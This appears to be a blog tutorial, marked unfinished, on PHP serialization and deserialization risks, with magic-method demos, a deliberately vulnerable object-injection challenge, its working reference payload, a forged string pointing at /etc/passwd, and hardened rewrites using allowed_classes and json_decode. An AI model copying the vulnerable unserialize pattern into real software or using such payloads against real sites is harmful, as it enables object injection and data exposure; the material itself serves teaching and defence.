PHP serialize && unserialize Security Risk (unfinished)

Source: Internet
Author: User
Tags: php, session

Directory

1. Definition of serialization
2. serialize: Serialization
3. unserialize: Deserialization
4. Serialization and deserialization security risks

1. Definition of serialization

Serialization usually has the following definitions in computer science:

12

There are several advantages to serialization:

1. A simple and durable way to persist objects
2.
3. A method of distributing objects, especially within software components such as COM and CORBA

Relevant Link:

http://zh.wikipedia.org/wiki/%e5%ba%8f%e5%88%97%e5%8c%96
http://baike.baidu.com/view/160029.htm

2. Serialize: Serialization

serialize(): produces a storable representation of a value.
serialize() returns a string containing a byte-stream representation of the value that can be stored anywhere. This makes it possible to store or pass around PHP values without losing their type and structure.
serialize() can handle every type except resource, including:

1. arrays that contain a reference to themselves;
2. references inside arrays/objects: the reference itself is serialized, so the reference relationship is preserved after unserialize() (this detail matters in the object injection case in section 4);
3. ...

Essentially, serialization takes a value (in the broad sense: integer, float, string, array or object), walks its members, and converts it into a generic intermediate string that can be stored. For an object, the magic methods involved in the serialization life cycle are:

1. __sleep(): called by serialize() before the object is written out. It must return an array of the property names to serialize (useful for committing pending work or dropping members such as open connections). It does not destroy the object; if it returns nothing, serialize() emits a notice and produces N; (null).
2. __destruct(): not part of serialize() itself. It runs when the object is destroyed, i.e. when its last reference goes away or the script ends. In the sample below the unserialized copy is never assigned to a variable, so its __destruct() fires immediately after __wakeup(); the original $obj is destroyed at script end. This is why destructor gadgets fire even when the result of unserialize() is discarded.

Code

<?php
class Connection {
    var $protected_var;
    var $private_var;

    public function __construct($server, $username, $password, $db) {
        echo "function __construct() is called" . "</br>";
        $this->protected_var = "protected_var";
        $this->private_var = "private_var";
    }

    function __destruct() {
        echo "function __destruct() is called" . "</br>";
    }

    // __sleep() must return the list of property names to serialize;
    // returning nothing makes serialize() emit a notice and store null.
    public function __sleep() {
        echo "function __sleep() is called" . "</br>";
        return ['protected_var', 'private_var'];
    }

    public function __wakeup() {
        echo "function __wakeup() is called" . "</br>";
    }
}

// Initialize a var (the constructor requires its four arguments)
$obj = new Connection('localhost', 'user', 'password', 'db');
//var_dump($obj);
$result = serialize($obj);
//var_dump($result);
// The result is not assigned, so the new object's __destruct() runs right after __wakeup()
unserialize($result);
?>

Relevant Link:

http://php.net/manual/zh/function.serialize.php
http://php.net/manual/zh/language.oop5.magic.php#object.wakeup
http://php.net/manual/zh/language.oop5.decon.php

3. Unserialize: Deserialization

unserialize(): creates a PHP value from a stored representation.
unserialize() takes a single serialized variable and converts it back into a PHP value.

During deserialization the object goes through the following life cycle:

1. The object is re-created from the class name and property values stored in the string. __construct() is NOT called: every property value comes straight from the serialized data, so whoever controls the string controls the object's state, and any validation the constructor performs is bypassed.
2. __wakeup(): called after the properties have been restored, typically to re-establish connections that __sleep() dropped. (PHP 7.4 adds __unserialize(), which takes precedence over __wakeup() when both are defined.)
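The following is an added example (not code from the original post) that makes the two points above concrete: a normal serialize()/unserialize() round trip, then a hand-written string standing in for attacker input, which is accepted without the constructor ever running. The Connection class, its property values and the forged string are all invented for this demonstration; the allowed_classes option is the real one introduced in PHP 7.0.

```php
<?php
// Added example, not code from the original post. It shows what unserialize()
// does with a string the caller (or an attacker) controls: the constructor is
// never run, every property value is taken from the string, and __wakeup() is
// the only hook that fires. Class name and values are invented for the demo.
class Connection {
    public $host;
    public $logFile;
    private $dsn;

    public function __construct(string $host) {
        echo "__construct: connecting to {$host}\n";
        $this->host = $host;
        $this->logFile = '/tmp/app.log';
        $this->dsn = "mysql:host={$host}";
    }

    // Called by serialize(); must return the property names to write out.
    // dsn is left out on purpose, so it never appears in the stored string.
    public function __sleep(): array {
        return ['host', 'logFile'];
    }

    // Called by unserialize() after the properties have been restored.
    public function __wakeup(): void {
        echo "__wakeup: host={$this->host} logFile={$this->logFile}\n";
    }
}

// 1. Normal round trip: __construct runs once, then __sleep, then __wakeup.
$conn = new Connection('db.internal');
$blob = serialize($conn);
echo $blob, "\n";
$copy = unserialize($blob);

// 2. A hand-written string standing in for attacker input (constructed for
//    this example): same class, but logFile now points where it should not.
//    No "__construct" line is printed; __wakeup() reports the forged value.
$forged = 'O:10:"Connection":2:{s:4:"host";s:11:"db.internal";s:7:"logFile";s:11:"/etc/passwd";}';
$obj = unserialize($forged);
var_dump($obj instanceof Connection, $obj->logFile);

// 3. PHP 7+: refuse to instantiate any class. The object comes back as
//    __PHP_Incomplete_Class and __wakeup() is never called, which is the
//    right default when the input is untrusted and only scalars/arrays are expected.
$safe = unserialize($forged, ['allowed_classes' => false]);
var_dump(get_class($safe), $safe instanceof Connection);
```

The string produced in step 1 has the form O:10:"Connection":2:{s:4:"host";s:11:"db.internal";s:7:"logFile";s:12:"/tmp/app.log";} (O: class-name length and name, the property count, then each property as a length-prefixed s: name and value); the forged string in step 2 only changes one value, and nothing in unserialize() itself distinguishes the two. Passing allowed_classes => false (or an explicit allow-list) is the cheapest mitigation when the caller really needs unserialize(); when the data only ever contains scalars and arrays, json_decode() removes the class-instantiation problem entirely.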

Relevant Link:

http://php.net/manual/zh/function.unserialize.php

4. Serialization and deserialization of security risks

0x1: Object Injection

<?php
# GOAL: get the secret
class Just4Fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];
    // magic_quotes_gpc only exists up to PHP 5.3; the guard keeps the script loadable on newer PHP
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $pass = stripslashes($pass);
    }
    // deliberately vulnerable: a user-controlled string goes straight into unserialize()
    $o = unserialize($pass);
    if ($o) {
        $o->secret = "?????????????????????????????";
        if ($o->secret === $o->enter)
            echo "congratulation! Here is my secret: " . $o->secret;
        else
            echo "Oh No... You can't fool me";
    } else
        echo "Are you trolling?";
}
?>

The script overwrites $o->secret before comparing it with $o->enter, so no value smuggled in through enter can match on its own. The trick is to make enter a PHP reference to secret before serializing the Just4Fun object:

$o->enter = &$o->secret;

serialize() stores the reference (the serialized string is O:8:"Just4Fun":2:{s:5:"enter";N;s:6:"secret";R:2;}, where R:2 points back at the second entry in the serialization table, i.e. the value of enter), and unserialize() rebuilds it. When the script then assigns $o->secret, $o->enter changes with it and the strict comparison succeeds. Note that checking the class with instanceof does not help here: the payload is a genuine Just4Fun object.
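To show the whole chain end to end, the following added example (not part of the original challenge) generates the reference payload with serialize(), feeds it to the challenge's own logic wrapped in a function, and then contrasts it with a rewrite that never passes user input to unserialize(). The function names vulnerable_check, build_payload and hardened_check are chosen for this example; the JSON input format of the hardened version is an assumption, not something the challenge specifies.

```php
<?php
// Added example, not code from the original challenge. It builds the reference
// payload for the Just4Fun script above, runs it through the same check, and
// then shows a rewrite that never hands user input to unserialize().
class Just4Fun {
    var $enter;
    var $secret;
}

// The challenge's logic, wrapped in a function so it can be fed a string
// directly instead of $_GET['pass']. Behaviour is unchanged and still vulnerable.
function vulnerable_check(string $pass): string {
    $o = @unserialize($pass);
    if (!$o) {
        return "Are you trolling?";
    }
    $o->secret = "?????????????????????????????";
    if ($o->secret === $o->enter) {
        return "congratulation! Here is my secret: " . $o->secret;
    }
    return "Oh No... You can't fool me";
}

// Payload: make enter a PHP reference to secret, then serialize. serialize()
// records the reference as R:n and unserialize() rebuilds it, so the two
// properties share one value no matter what the script later assigns.
function build_payload(): string {
    $o = new Just4Fun();
    $o->enter = &$o->secret;
    return serialize($o);
}

// Hardened rewrite: parse JSON (no objects and no references can come out of
// it), validate the single field we need, and build the Just4Fun object
// ourselves so enter and secret are always two independent values.
function hardened_check(string $input): string {
    $data = json_decode($input, true);
    if (!is_array($data) || !isset($data['enter']) || !is_string($data['enter'])) {
        return "Are you trolling?";
    }
    $o = new Just4Fun();
    $o->enter = $data['enter'];
    $o->secret = "?????????????????????????????";
    // constant-time compare: the secret is a credential, not something to leak by timing
    if (hash_equals($o->secret, $o->enter)) {
        return "congratulation! Here is my secret: " . $o->secret;
    }
    return "Oh No... You can't fool me";
}

$payload = build_payload();
echo "payload:    ", $payload, "\n";
echo "vulnerable: ", vulnerable_check($payload), "\n";
// The same trick expressed as JSON is just a string; the hardened version is not fooled.
echo "hardened:   ", hardened_check('{"enter":"R:2"}'), "\n";
// The serialized payload is not valid JSON, so it is rejected outright.
echo "hardened:   ", hardened_check($payload), "\n";
```

The important design point is that the fix is not a better comparison but a different input format: as long as unserialize() sees attacker bytes, the attacker can hand back any class the autoloader can find, with any property values and with references between them. Where unserialize() cannot be removed, the allowed_classes option (PHP 7+) limits which classes can be instantiated, but it does nothing against the reference trick inside an allowed class, as this challenge shows.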

0x2: PHP session serialization and deserialization handlers

http://drops.wooyun.org/tips/3909

0x3: Webshell hiding techniques based on serialization and deserialization

http://www.cnblogs.com/LittleHann/p/3522990.html (search for section 0x22)

Relevant Link:

http://drops.wooyun.org/papers/660

Copyright (c) Littlehann All rights reserved
